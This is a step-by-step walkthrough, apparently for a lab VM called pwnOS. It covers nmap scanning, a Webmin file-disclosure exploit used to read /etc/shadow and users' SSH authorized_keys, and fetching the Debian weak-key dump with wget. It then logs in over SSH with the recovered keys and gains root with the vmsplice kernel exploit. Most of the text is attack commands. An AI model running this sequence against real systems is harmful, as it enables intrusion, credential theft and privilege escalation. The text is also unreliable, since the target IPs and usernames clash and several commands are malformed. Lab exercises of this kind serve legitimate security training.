Hacking pwnOS system using Backtrack

Stage 1: Foot Printing (Identifying Live system) nmap 192.168.1.1-255 Stage 2: Scanning / Banner Grabbing (Service & Version Identification) nmap -sV -sS -O 192.168.1.89 As we are able to see port 10000 (Webmin) and 22 (Debian OpenSSH / OpenSSL) ports are listening, we will be searching for vulnerabilities related to the same. Browse www.exploit-db.com and search for Webmin and OpenSSL. Stage 3: Gaining Access Download Webmin exploit code (Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)) from the following link http://www.exploit-db.com/exploits/2017/ and make it an executable file. Execute the Webmin exploit using the following syntax perl webmin.pl 192.168.1.89 10000 /etc/shadow 0 We will be able to observe that the victim system contains users by name vmware, obama, osama and momama. Save the output in a file.Extract the authorized keys for vmware, osama, obama and momama users using file disclosure vulnerability. perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys Save the output of these in a file. Make use of OpenSSL vulnerability which can extract RSA keys to exploit. Download RSA 2048 dump from the following link http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 with the help of wget Wget http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 Extract the content of tar ball using the following command. tar jxvf debian_ssh_rsa_2048_x86.tar.bz cd rsa/2048 Scan for public key by using grep command grep lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/ LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/ OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/ eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/ VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/

uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwF dF02Iuw rsa/2048/*.pub grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx 2wrcAw09HayPxMnKv+BFiGA/ I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7D phKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/ jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyot EBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/ *.pub Save the obtained public keys and use them for ssh authorization ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 [email protected] exit or for vmware user ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 [email protected] hostname uname a / uname r We will be able to observe that the system is running linux kernel 2.6.17. Search for privilege escalation vulnerability on Linux kernel 2.6.17. Stage 4: Privilege escalation Visit www.exploit-db.com search for Linux kernel 2.6 and download exploit code (*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*) from the following link http://www.exploit-db.com/exploits/5092/ . Save the file with .c as extension. nano vmsplice.c compile the c program using gcc gcc vmsplice.c -o vmsplice and execute ./vmsplice whoami

#########################################################################################